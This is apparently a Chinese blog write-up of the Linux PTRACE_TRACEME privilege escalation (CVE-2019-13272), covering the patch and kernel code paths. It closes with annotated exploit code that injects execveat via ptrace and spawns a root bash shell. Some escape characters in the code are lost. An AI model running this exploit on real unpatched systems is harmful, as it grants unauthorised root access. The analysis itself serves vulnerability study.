PTRACE_TRACEME CVE-2019-13272 本地提权漏洞解析-安全KER

PTRACE_TRACEME 漏洞是 Jann Horn 201907 月发现的内核提权漏洞, 漏洞发现和利用的思路有很多值得学习的地方, 本文记录了个人的学习过程

author: Gengjia Chen (chengjia4574@gmail.com) of IceSwordLab, qihoo 360

漏洞补丁

我们从漏洞补丁 ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME 入手分析

Fix two issues:

// 第一个问题，是 cred 的 rcu reference 问题
When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU   
reference to the parent's objective credentials, then give that pointer
to get_cred().  However, the object lifetime rules for things like
struct cred do not permit unconditionally turning an RCU reference into
a stable reference.

// 第二个问题，tracee 记录的 tracer 的 cred 的问题
PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.


Fix both of these by always recording the credentials of the process
that is requesting the creation of the ptrace relationship:
current_cred() can't change under us, and current is the proper subject
for access control.

以上是补丁的描述，以下是补丁的代码

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

从补丁的描述来看，一共修复了 2 个问题

1 是 rcu reference 的问题，对应的代码是删除了 rcu 锁;
2 是 tracee 记录 tracer 进程的 cred 引发的问题

本文不关心第一个问题，只分析可以用于本地提权的第二个问题

从补丁描述看第二个问题比较复杂，我们后面再分析，补丁对应的代码倒是非常简单，
将 ‘__task_cred(new_parent)’ 换成了 ‘current_cred()’, 也就是说记录的 cred 从 tracer 进程的 cred 换成了当前进程的 cred

漏洞分析

ptrace 是一个系统调用，它提供了一种方法来让进程 (tracer) 可以观察和控制其它进程 (tracee) 的执行，检查和改变其核心映像以及寄存器, 主要用来实现断点调试和系统调用跟踪

   1    396  kernel/ptrace.c <<ptrace_attach>>
             ptrace_link(task, current);  // link 的双方分别是要 trace 的目标进程 'task' 
                      //  和发动 trace 的当前进程 'current'
   2    469  kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  // link 的双方分别是发动 trace 的
                              // 当前进程 ‘current’ 和当前进程的
                              // 父进程 ' current->real_parent'

trace 关系的建立有 2 种方式

1 是进程调用 fork 函数然后子进程主动调用 PTRACE_TRACEME, 这是由 tracee 发起的, 对应内核函数 ptrace_traceme
2 是进程调用 PTRACE_ATTACH 或者 PTRACE_SEIZE 去主动 trace 其他进程, 这是由 tracer 发起的, 对应内核函数 ptrace_attach

不管是哪种方式，最后都会调用 ptrace_link 函数去建立 tracer 和 tracee 之间的 trace 关系

ptrace_attach 关联的双方是 ‘task’ (tracee) 和 ‘current’ (tracer)
ptrace_traceme 关联的双方是 ‘current’ (tracee) 和 ‘current->real_parent’ (tracer)

这里我们要仔细记住上面 2 种模式下 tracer 和 tracee 分别是什么，因为这就是漏洞的关键

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
                   const struct cred *ptracer_cred)
{
        BUG_ON(!list_empty(&child->ptrace_entry));
        list_add(&child->ptrace_entry, &new_parent->ptraced); // 1. 将自己加入父进程的 ptraced 队列
        child->parent = new_parent; // 2. 将父进程地址保存在 parent 指针
        child->ptracer_cred = get_cred(ptracer_cred); // 3. 保存 ptracer_cred, 我们只关注这个变量
}

建立 trace 关系的关键是由 tracee 记录 tracer 的 cred, 保存在 tracee 的 ‘ptracer_cred’ 变量，这个变量名很顾名思义

ptracer_cred 这个概念是由 2016 年的一个补丁 ptrace: Capture the ptracer’s creds not PT_PTRACE_CAP 引入的, 引入 ptracer_cred 的目的是用于当 tracee 执行 exec 去加载 setuid executable 时做安全检测

为什么需要这个安全检测呢?

exec 函数族可以更新进程的镜像, 如果被执行文件的 setuid 位置位，则运行这个可执行文件时，进程的 euid 会被修改成该可执行文件的所有者的 uid, 如果可执行文件的所有者权限比调用 exec 的进程高, 运行这类 setuid executable 会有提权的效果

假如执行 exec 的进程本身是一个 tracee, 当它执行了 setuid executable 提权之后，由于 tracer 可以随时修改 tracee 的寄存器和内存，这时候低权限的 tracer 就可以控制 tracee 去执行越权操作

作为内核，显然是不允许这样的越权行为存在的，所以当 trace 关系建立时, tracee 需要保存 tracer 的 cred (即 ptracer_cred), 然后在执行 exec 过程中, 如果发现执行的可执行程序是 setuid 位置位的，则会判断 ‘ptracer_cred’ 的权限，如果权限不满足，将不会执行 setuid 位的提权，而是以原有的进程权限执行这个 setuid executable

这个过程的代码分析如下(本文的代码分析基于 v4.19-rc8)

do_execve
  -> __do_execve_file
  -> prepare_binprm 
      -> bprm_fill_uid
      -> security_bprm_set_creds
          ->cap_bprm_set_creds
          -> ptracer_capable
          ->selinux_bprm_set_creds
          ->(apparmor_bprm_set_creds)
          ->(smack_bprm_set_creds)
          ->(tomoyo_bprm_set_creds)

如上，execve 权限相关的操作主要在函数 ‘prepare_binprm’ 里

    1567 int prepare_binprm(struct linux_binprm *bprm)
    1568 {
    1569         int retval;
    1570         loff_t pos = 0;
    1571 
    1572         bprm_fill_uid(bprm); // <-- 初步填充新进程的 cred
    1573 
    1574         /* fill in binprm security blob */
    1575         retval = security_bprm_set_creds(bprm); // <-- 安全检测，     
                             // 可能会修改新进程的 cred
    1576         if (retval)
    1577                 return retval;
    1578         bprm->called_set_creds = 1;
    1579 
    1580         memset(bprm->buf, 0, BINPRM_BUF_SIZE);
    1581         return kernel_read(bprm->file, bprm->buf, BINPRM_BUF_SIZE, &pos);
    1582 }

如上，先调用 ‘bprm_fill_uid’ 初步填充新进程的 cred, 再调用 ‘security_bprm_set_creds’ 做安全检测并修改新的 cred

    1509 static void bprm_fill_uid(struct linux_binprm *bprm)
    1510 {
    1511         struct inode *inode;
    1512         unsigned int mode;
    1513         kuid_t uid;
    1514         kgid_t gid;
    1515 
    1516         /*
    1517          * Since this can be called multiple times (via prepare_binprm),
    1518          * we must clear any previous work done when setting set[ug]id
    1519          * bits from any earlier bprm->file uses (for example when run
    1520          * first for a setuid script then again for its interpreter).
    1521          */
    1522         bprm->cred->euid = current_euid(); // <--- 先使用本进程的euid
    1523         bprm->cred->egid = current_egid();
    1524 
    1525         if (!mnt_may_suid(bprm->file->f_path.mnt))
    1526                 return;
    1527 
    1528         if (task_no_new_privs(current))
    1529                 return;
    1530 
    1531         inode = bprm->file->f_path.dentry->d_inode;
    1532         mode = READ_ONCE(inode->i_mode);
    1533         if (!(mode & (S_ISUID|S_ISGID))) // <---------- 如果可执行文件没有 setuid/setgid 位，这里就可以返回了
    1534                 return;
    1535 
    1536         /* Be careful if suid/sgid is set */
    1537         inode_lock(inode);
    1538 
    1539         /* reload atomically mode/uid/gid now that lock held */
    1540         mode = inode->i_mode;
    1541         uid = inode->i_uid; // <---- 如果文件 S_ISUID 置位，使用文件的 i_uid
    1542         gid = inode->i_gid;
    1543         inode_unlock(inode);
    1544 
    1545         /* We ignore suid/sgid if there are no mappings for them in the ns */
    1546         if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
    1547                  !kgid_has_mapping(bprm->cred->user_ns, gid))
    1548                 return;
    1549 
    1550         if (mode & S_ISUID) {
    1551                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1552                 bprm->cred->euid = uid; // <------ 使用文件的 i_uid 作为新进程的 euid
    1553         }
    1554 
    1555         if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
    1556                 bprm->per_clear |= PER_CLEAR_ON_SETID;
    1557                 bprm->cred->egid = gid;
    1558         }
    1559 }

如上，主要看两行

1522 行, 将当前的 euid 赋值新的 euid, 所以大部分执行了 execve 的进程的权限跟原来的一样
1552 行，如果带有 suid bit, 则将可执行文件的所有者的 uid 赋值新的 euid, 这就是所谓 setuid 的实现，新的 euid 变成了它执行的可执行文件所有者的 uid，如果所有者是特权用户，这里就实现了提权

但是，这里的 euid 依然不是最终的结果，还需要进入函数 security_bprm_set_creds 做进一步的安全检测

security_bprm_set_creds 函数调用的是 LSM 框架

在我分析的内核版本上, 实现 ‘bprm_set_creds’ 这个 hook 点安全检测的 lsm 框架有 5 种, 检测函数如下,

cap_bprm_set_creds
selinux_bprm_set_creds
apparmor_bprm_set_creds
smack_bprm_set_creds
tomoyo_bprm_set_creds

这里哪些 hook 检测函数会被执行，其实是跟具体的内核配置有关的, 理论上把所有 lsm 框架都启用的话，上述所有这些实现了 ‘bprm_set_creds’ hook 检测的函数都会被执行

在我的分析环境里实际运行的检测函数只有 cap_bprm_set_creds 和 selinux_bprm_set_creds 这俩

其中，对 euid 有影响的是 ‘cap_bprm_set_creds’ 这个函数

    815 int cap_bprm_set_creds(struct linux_binprm *bprm)
    816 {
    817         const struct cred *old = current_cred();
    818         struct cred *new = bprm->cred;
    819         bool effective = false, has_fcap = false, is_setid;
    820         int ret;
    821         kuid_t root_uid;
    ===================== skip ======================
    838         /* Don't let someone trace a set[ug]id/setpcap binary with the revised
    839          * credentials unless they have the appropriate permit.
    840          *
    841          * In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
    842          */
    843         is_setid = __is_setuid(new, old) || __is_setgid(new, old);  
    844 
    845         if ((is_setid || __cap_gained(permitted, new, old)) && // <---- 检测是否执行的是 setid 程序
    846             ((bprm->unsafe & ~LSM_UNSAFE_PTRACE) || 
    847              !ptracer_capable(current, new->user_ns))) { // <----- 如果执行execve的进程被trace了，且执行的程序是 setuid 的，需要增加权限检测
    848                 /* downgrade; they get no more than they had, and maybe less */
    849                 if (!ns_capable(new->user_ns, CAP_SETUID) ||
    850                     (bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
    851                         new->euid = new->uid; // <----- 如果检测不通过，会将新进程的 euid 重新设置为原进程的 uid
    852                         new->egid = new->gid;
    853                 }
    854                 new->cap_permitted = cap_intersect(new->cap_permitted,
    855                                                    old->cap_permitted);
    856         }
    857 
    858         new->suid = new->fsuid = new->euid;
    859         new->sgid = new->fsgid = new->egid;
    ===================== skip ======================
}

如上

行 845, 检测 euid 是否跟原有的 uid 不一致 (在函数 bprm_fill_uid 分析里我们知道，如果执行的文件是 setuid bit 的， euid 就会不一致)
```
所以这里等同于检测执行的可执行程序是不是 setid 程序
```
行 847, 检测本进程是否是 tracee

如果两个条件同时满足，需要执行 ptracer_capable 函数进行权限检测，假设检测不通过，会执行 downgrade 降权

行 851, 将 new->euid 的值重新变成 new->uid，就是说在函数 bprm_fill_uid 里提的权在这里可能又被降回去

    499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred); // <----- 取出 ptrace_link 时保存的 ptracer_cred 
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE); // <-------- 进入 lsm 框架进行安全检测
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

如上，

行 504, 取出 ‘tsk->ptracer_cred’
行 506, 进入 lsm 框架对 ‘tsk->ptracer_cred’ 进行检测

到了这里，这个漏洞涉及到的变量 ‘tsk->ptracer_cred’ 终于出现了，如前所述，这个变量是建立 trace 关系时， tracee 保存的 tracer 的 cred

当 tracee 随后执行 execve 去执行 suid 可执行程序时，就会调用 ptracer_capable 这个函数，通过 lsm 里的安全框架去判断 ‘ptracer_cred’ 的权限

lsm 框架里的 capable hook 检测我们这里不分析了，简单来说，如果 tracer 本身是 root 权限，则这里的检测会通过，如果不是，就会返回失败

根据前面的分析，如果 ptracer_capable 检测失败， new->euid 的权限会被降回去

举个例子， A ptrace B , B execve 执行 ‘/usr/bin/passwd’, 根据上面代码的分析，如果 A 是 root 权限，则 B 执行 passwd 时的 euid 是 root, 否则就还是原有的权限

kernel/ptrace.c <<ptrace_traceme>>
             ptrace_link(current, current->real_parent);  

static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
{
        rcu_read_lock();
        __ptrace_link(child, new_parent, __task_cred(new_parent));
        rcu_read_unlock();
}

回到漏洞代码, 为什么 traceme 在建立 trace link 时记录 parent 的 cred 是不对的呢? 明明这时候 parent 就是 tracer 啊?

我们用 Jann Horn 举的例子来说明为什么 traceme 这种方式建立 trace link 时不能使用 tracer 的 cred

 - 1, task A: fork()s a child, task B
 - 2, task B: fork()s a child, task C
 - 3, task B: execve(/some/special/suid/binary)
 - 4, task C: PTRACE_TRACEME (creates privileged ptrace relationship)
 - 5, task C: execve(/usr/bin/passwd)
 - 6, task B: drop privileges (setresuid(getuid(), getuid(), getuid()))
 - 7, task B: become dumpable again (e.g. execve(/some/other/binary))
 - 8, task A: PTRACE_ATTACH to task B
 - 9, task A: use ptrace to take control of task B
 - 10, task B: use ptrace to take control of task C

如上场景有 3 个进程 A, B, C

第 4 步， task C 使用 PTRACE_TRACE 建立跟 B 的 trace link 时，由于 B 此时是 euid = 0 (因为它刚刚执行了 suid binary), 所以 C 记录的 ptracer_cred 的 euid 也是 0
第 5 步， task C 随后执行 execve(suid binary), 根据我们上面的分析，由于 C 的 ptracer_cred 是特权的，所以 ptracer_capable 函数检测通过，所以执行完 execve 后， task C 的 euid 也提权成 0 , 注意此时 B 和 C 的 trace link 还是有效的
第 6 步， task B 执行 setresuid 将自己降权，这个降权的目的是为了能让 task A attach
第 8 步， task A 使用 PTRACE_ATTACH 建立跟 B 的 trace link, A 和 B 都是普通权限, 之后 A 可以控制 B 执行任何操作
第 9 步， task B 控制 task C 执行提权操作

前面 8 步，依据之前的代码分析都是成立的，那么第 9 步能不能成立呢?

执行第 9 步时， task B 本身是普通权限， task C 的 euid 是 root 权限， B 和 C 的 trace link 有效, 这种条件下 B 能不能发送 ptrace request 让 C 执行各种操作，包括提权操作?

下面我们结合代码分析这个问题


    1111 SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
    1112                 unsigned long, data)
    1113 {
    1114         struct task_struct *child;
    1115         long ret;
    1116 
    1117         if (request == PTRACE_TRACEME) {
    1118                 ret = ptrace_traceme(); // <----- 进入 traceme 分支
    1119                 if (!ret)
    1120                         arch_ptrace_attach(current);
    1121                 goto out;
    1122         }
    1123 
    1124         child = find_get_task_by_vpid(pid);
    1125         if (!child) {
    1126                 ret = -ESRCH;
    1127                 goto out;
    1128         }
    1129 
    1130         if (request == PTRACE_ATTACH || request == PTRACE_SEIZE) {
    1131                 ret = ptrace_attach(child, request, addr, data); // <------ 进入 attach 分支
    1132                 /*
    1133                  * Some architectures need to do book-keeping after
    1134                  * a ptrace attach.
    1135                  */
    1136                 if (!ret)
    1137                         arch_ptrace_attach(child);
    1138                 goto out_put_task_struct;
    1139         }
    1140 
    1141         ret = ptrace_check_attach(child, request == PTRACE_KILL ||
    1142                                   request == PTRACE_INTERRUPT);
    1143         if (ret < 0)
    1144                 goto out_put_task_struct;
    1145 
    1146         ret = arch_ptrace(child, request, addr, data); // <---- 其他 ptrace request 
    1147         if (ret || request != PTRACE_DETACH)
    1148                 ptrace_unfreeze_traced(child);
    1149 
    1150  out_put_task_struct:
    1151         put_task_struct(child);
    1152  out:
    1153         return ret;
    1154 }

如上，由于 task B 和 task C 此时已经存在 trace link，所以通过 B 向 C 可以直接发送 ptrace request，将进入函数 arch_ptrace

arch/x86/kernel/ptrace.c

arch_ptrace 
    -> ptrace_request 
        -> generic_ptrace_peekdata
           generic_ptrace_pokedata 
            -> ptrace_access_vm 
                -> ptracer_capable 

 kernel/ptrace.c
 884 int ptrace_request(struct task_struct *child, long request,
 885                    unsigned long addr, unsigned long data)
 886 {
 887         bool seized = child->ptrace & PT_SEIZED;
 888         int ret = -EIO;
 889         siginfo_t siginfo, *si;
 890         void __user *datavp = (void __user *) data;
 891         unsigned long __user *datalp = datavp;
 892         unsigned long flags;
 893 
 894         switch (request) {
 895         case PTRACE_PEEKTEXT:
 896         case PTRACE_PEEKDATA:
 897                 return generic_ptrace_peekdata(child, addr, data);
 898         case PTRACE_POKETEXT:
 899         case PTRACE_POKEDATA:
 900                 return generic_ptrace_pokedata(child, addr, data);
 901 
 =================== skip ================
 1105 }


 1156 int generic_ptrace_peekdata(struct task_struct *tsk, unsigned long addr,
 1157                             unsigned long data)
 1158 {
 1159         unsigned long tmp;
 1160         int copied;
 1161 
 1162         copied = ptrace_access_vm(tsk, addr, &tmp, sizeof(tmp), FOLL_FORCE); // <--- 调用 ptrace_access_vm
 1163         if (copied != sizeof(tmp))
 1164                 return -EIO;
 1165         return put_user(tmp, (unsigned long __user *)data);
 1166 }
 1167 
 1168 int generic_ptrace_pokedata(struct task_struct *tsk, unsigned long addr,
 1169                             unsigned long data)
 1170 {
 1171         int copied;
 1172 
 1173         copied = ptrace_access_vm(tsk, addr, &data, sizeof(data), // <---- 调用 ptrace_access_vm
 1174                         FOLL_FORCE | FOLL_WRITE);
 1175         return (copied == sizeof(data)) ? 0 : -EIO;
 1176 }

如上，当 tracer 想要控制 tracee 执行新的代码逻辑时，需要发送 request 读写 tracee 的代码区和内存区，对应的 request 是 PTRACE_PEEKTEXT / PTRACE_PEEKDATA / PTRACE_POKETEXT / PTRACE_POKEDATA

这几种读写操作最终都是通过函数 ptrace_access_vm 实现的

    kernel/ptrace.c
    38 int ptrace_access_vm(struct task_struct *tsk, unsigned long addr,
    39                      void *buf, int len, unsigned int gup_flags)
    40 {
    41         struct mm_struct *mm;
    42         int ret;
    43 
    44         mm = get_task_mm(tsk);
    45         if (!mm)
    46                 return 0;
    47 
    48         if (!tsk->ptrace ||
    49             (current != tsk->parent) ||
    50             ((get_dumpable(mm) != SUID_DUMP_USER) &&
    51              !ptracer_capable(tsk, mm->user_ns))) { // < ----- 又是调用 ptracer_capable 函数
    52                 mmput(mm);
    53                 return 0;
    54         }
    55 
    56         ret = __access_remote_vm(tsk, mm, addr, buf, len, gup_flags);
    57         mmput(mm);
    58 
    59         return ret;
    60 }

    kernel/capability.c
    499 bool ptracer_capable(struct task_struct *tsk, struct user_namespace *ns)
    500 {
    501         int ret = 0;  /* An absent tracer adds no restrictions */
    502         const struct cred *cred;
    503         rcu_read_lock();
    504         cred = rcu_dereference(tsk->ptracer_cred);
    505         if (cred)
    506                 ret = security_capable_noaudit(cred, ns, CAP_SYS_PTRACE);
    507         rcu_read_unlock();
    508         return (ret == 0);
    509 }

如上， ptrace_access_vm 函数会调用我们之前分析到的 ‘ptracer_capable’ 来决定这个 request 是否可以进行, 这是 ‘ptracer_capable’ 函数的第二种使用场景

根据之前我们分析的结果， task C 此时保存的 ptracer_cred 是特权 cred, 所以这时候 ptracer_capable 会通过，也就是说我们回答了刚刚的问题，这种情况下，普通权限的 task B 是可以发送 ptrace request 去读写 root 权限的 task C 的内存区和代码区的

至此，task C 记录的这个特权 ptracer_cred 实际上发挥了 2 种作用

1，可以让 task C 执行 execve(suid binary) 给自己提权
2，可以让普通权限的 task B 执行 ptrace 读写 task C 的代码区和内存区，从而控制 task C 执行任意操作

上面 2 点合起来，不就是完整的提权操作吗?

小结

我们仔细回顾上述代码分析过程，才终于明白补丁描述写的这段话

PTRACE_TRACEME records the parent's credentials as if the parent was 
acting as the subject, but that's not the case.  If a malicious
unprivileged child uses PTRACE_TRACEME and the parent is privileged, and
at a later point, the parent process becomes attacker-controlled
(because it drops privileges and calls execve()), the attacker ends up
with control over two processes with a privileged ptrace relationship,
which can be abused to ptrace a suid binary and obtain root privileges.

本质上这个漏洞有点像 TOCTOU 类漏洞, ptracer_cred 的获取是在 traceme 阶段, 而 ptracer_cred 的应用是在随后的各种 request 阶段，而在随后的 ptrace request 的时候， tracer 的 cred 可能已经不是一开始建立 trace link 时的那个 cred 了

diff --git a/kernel/ptrace.c b/kernel/ptrace.c
index 8456b6e..705887f 100644
--- a/kernel/ptrace.c
+++ b/kernel/ptrace.c
@@ -79,9 +79,7 @@ void __ptrace_link(struct task_struct *child, struct task_struct *new_parent,
  */
 static void ptrace_link(struct task_struct *child, struct task_struct *new_parent)
 {
-    rcu_read_lock();
-    __ptrace_link(child, new_parent, __task_cred(new_parent));
-    rcu_read_unlock();
+    __ptrace_link(child, new_parent, current_cred());
 }

我们再次看看 jann horn 的补丁: ‘__task_cred(new_parent)’ -> ‘current_cred()’

补丁的意思是说在 PTRACE_TRACEME 这种场景下， ptracer_cred 记录的不应该是父进程的 cred，而应该是自己的 cred

所以我觉得从这个变量的用途来说，它其实记录的不是 tracer 的 cred, 而是 ‘trace link creater’ 的 cred

我建议 jann horn 将这个变量名改成 ptracelinkcreater_cred, 当 trace link 由 PTRACE_ATTACH 建立时，它等于 tracer 的 cred, 当 trace link 由 PTRACE_TRACEME 建立时，它等于 tracee 的 cred, 它实际上记录的是 trace 关系建立者的权限 !

exploit

本漏洞利用的关键是找到合适的可执行程序启动 task B, 这个可执行程序要满足如下条件:

1, 必须是能被普通权限用户调用
2, 执行时必须有提权到root的阶段
3, 执行提权后必须执行降权

(短暂提权到 root 的目的是让 task C 可以获取 root 的 ptracer_cred, 再降权的目的是让 B 能被普通权限的进程 ptrace attach)

这里我列出 3 份 exploit 代码:

jann horn 的 exploit 里使用桌面发行版自带的 pkexec 程序用于启动 task B

pkexec 允许特权用户以其他用户权限执行另外一个可执行程序，用于 polkit 认证框架, 当使用 —user 参数时，刚好可以让进程先提权到 root 然后再降权到指定用户，因此可以用于构建进程 B, 此外需要找到通过 polkit 框架执行的可执行程序(jann horn 把他们成为 helper)，这些 helper 程序需要满足普通用户用 pkexec 执行它们时不需要认证（很多通过 polkit 执行的程序都需要弹窗认证）, 执行的模式如下:

/usr/bin/pkexec —user nonrootuser /user/sbin/some-helper-binary

bcoles 的 exploit 在 jann horn 的基础上增加了寻找更多 helper binary 的代码，因为 jann horn 的 helper 是一个写死的程序，在很多发行版并不存在，所以他的 exploit 在很多发行版系统上无法运行， bcoles 的 exploit 可以在更多的发行版上运行成功

本人出于学习的目的，也写了一份 jiayy 的 exploit, 因为 helper binary 因不同发行版而异， pkexec 也是桌面发行版才有，而事实上这个提权漏洞是 linux kernel 的漏洞，所以我把 jann horn 的 exploit 改成了使用一个 fakepkexec 程序来提权，而这个 fakepkexec 和 fakehelper 程序手动生成（而不是从目标系统搜索），这样一来学习者可以在任何存在本漏洞的 linux 系统（不需要桌面）运行我的 exploit 进行研究

exploit 分析

下面简单过一下 exploit 的代码


167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();
172 
173   helper_path = "/tmp/fakehelper";
174 
175   /*
176    * set up a pipe such that the next write to it will block: packet mode,
177    * limited to one packet
178    */
179   SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
180   SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
181   char dummy = 0;
182   SAFE(write(block_pipe[1], &dummy, 1));
183 
184   /* spawn pkexec in a child, and continue here once our child is in execve() */
185   static char middle_stack[1024*1024];
186   pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
187                             CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
188   if (!middle_success) return 1;
189 
======================= skip =======================
215 }

先看行 186, 调用 clone 生成子进程（也就是 task B）, task B 运行 middle_main

 64 static int middle_main(void *dummy) {
 65   prctl(PR_SET_PDEATHSIG, SIGKILL);
 66   pid_t middle = getpid();
 67 
 68   self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
 69 
 70   pid_t child = SAFE(fork());
 71   if (child == 0) {
 72     prctl(PR_SET_PDEATHSIG, SIGKILL);
 73 
 74     SAFE(dup2(self_fd, 42));
 75 
 76     /* spin until our parent becomes privileged (have to be fast here) */
 77     int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
 78     char *needle = tprintf("nUid:t%dt0t", getuid());
 79     while (1) {
 80       char buf[1000];
 81       ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
 82       buf[buflen] = '';
 83       if (strstr(buf, needle)) break;
 84     }
 85 
 86     /*
 87      * this is where the bug is triggered.
 88      * while our parent is in the middle of pkexec, we force it to become our
 89      * tracer, with pkexec's creds as ptracer_cred.
 90      */
 91     SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
 92 
 93     /*
 94      * now we execute passwd. because the ptrace relationship is considered to
 95      * be privileged, this is a proper suid execution despite the attached
 96      * tracer, not a degraded one.
 97      * at the end of execve(), this process receives a SIGTRAP from ptrace.
 98      */
 99     puts("executing passwd");
100     execl("/usr/bin/passwd", "passwd", NULL);
101     err(1, "execl passwd");
102   }
103 
104   SAFE(dup2(self_fd, 0));
105   SAFE(dup2(block_pipe[1], 1));
106 
107   struct passwd *pw = getpwuid(getuid());
108   if (pw == NULL) err(1, "getpwuid");
109 
110   middle_success = 1;
111   execl("/tmp/fakepkexec", "fakepkexec", "--user", pw->pw_name, NULL);
112   middle_success = 0;
113   err(1, "execl pkexec");
114 }

行 70, 调用 fork 生成孙进程（也就是 task C）

然后行 111, task B 运行 fakepkexec 让自己提权再降权

然后看行 76 ~ 84, task C 检测到 task B 的 euid 变成 0 之后，会执行行 91 进行 PTRACE_TRACEME 操作获取 root 的 ptracer_cred, 然后紧接着 task C 马上运行 execl 执行一个 suid binary 让自己的 euid 变成 0


190   /*
191    * wait for our child to go through both execve() calls (first pkexec, then
192    * the executable permitted by polkit policy).
193    */
194   while (1) {
195     int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
196     char buf[16];
197     int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
198     buf[buflen] = '';
199     *strchrnul(buf, 'n') = '';
200     if (strncmp(buf, basename(helper_path), 15) == 0)
201       break;
202     usleep(100000);
203   }
204 
205   /*
206    * our child should have gone through both the privileged execve() and the
207    * following execve() here
208    */
209   SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
210   SAFE(waitpid(midpid, &dummy_status, 0));
211   fputs("attached to midpidn", stderr);
212 
213   force_exec_and_wait(midpid, 0, "stage2");
214   return 0;

接下去回到 task A 的 main 函数，行 194 ~ 202, task A 检测到 task B 的 binary comm 变成 helper 之后，
运行行 213 执行 force_exec_and_wait

116 static void force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
117   struct user_regs_struct regs;
118   struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
119   SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
120   SAFE(waitpid(pid, &dummy_status, 0));
121   SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
122 
123   /* set up indirect arguments */
124   unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
125   struct injected_page {
126     unsigned long argv[2];
127     unsigned long envv[1];
128     char arg0[8];
129     char path[1];
130   } ipage = {
131     .argv = { scratch_area + offsetof(struct injected_page, arg0) }
132   };
133   strcpy(ipage.arg0, arg0);
134   for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
135     unsigned long pdata = ((unsigned long *)&ipage)[i];
136     SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
137                 (void*)pdata));
138   }
139 
140   /* execveat(exec_fd, path, argv, envv, flags) */
141   regs.orig_rax = __NR_execveat;
142   regs.rdi = exec_fd;
143   regs.rsi = scratch_area + offsetof(struct injected_page, path);
144   regs.rdx = scratch_area + offsetof(struct injected_page, argv);
145   regs.r10 = scratch_area + offsetof(struct injected_page, envv);
146   regs.r8 = AT_EMPTY_PATH;
147 
148   SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
149   SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
150   SAFE(waitpid(pid, &dummy_status, 0));
151 }

函数 force_exec_and_wait 的作用是使用 ptrace 控制 tracee 执行 execveat 函数替换进程的镜像, 这里它控制 task B 执行了 task A 的进程（即 exploit 的可执行程序）然后参数为 stage2, 这实际上就是让 task B 执行了 middle_stage2 函数

167 int main(int argc, char **argv) {
168   if (strcmp(argv[0], "stage2") == 0)
169     return middle_stage2();
170   if (strcmp(argv[0], "stage3") == 0)
171     return spawn_shell();

而 middle_stage2 函数同样调用了 force_exec_and_wait , 这将使 task B 利用 ptrace 控制 task C 执行 execveat 函数，将 task C 的镜像也替换为 exploit 的 binary, 且参数是 stage3

153 static int middle_stage2(void) {
154   /* our child is hanging in signal delivery from execve()'s SIGTRAP */
155   pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
156   force_exec_and_wait(child, 42, "stage3");
157   return 0;
158 }

当 exploit binary 以参数 stage3 运行时，实际运行的是 spawn_shell 函数, 所以 task C 最后阶段运行的是 spawn_shell

160 static int spawn_shell(void) {
161   SAFE(setresgid(0, 0, 0));
162   SAFE(setresuid(0, 0, 0));
163   execlp("bash", "bash", NULL);
164   err(1, "execlp");
165 }

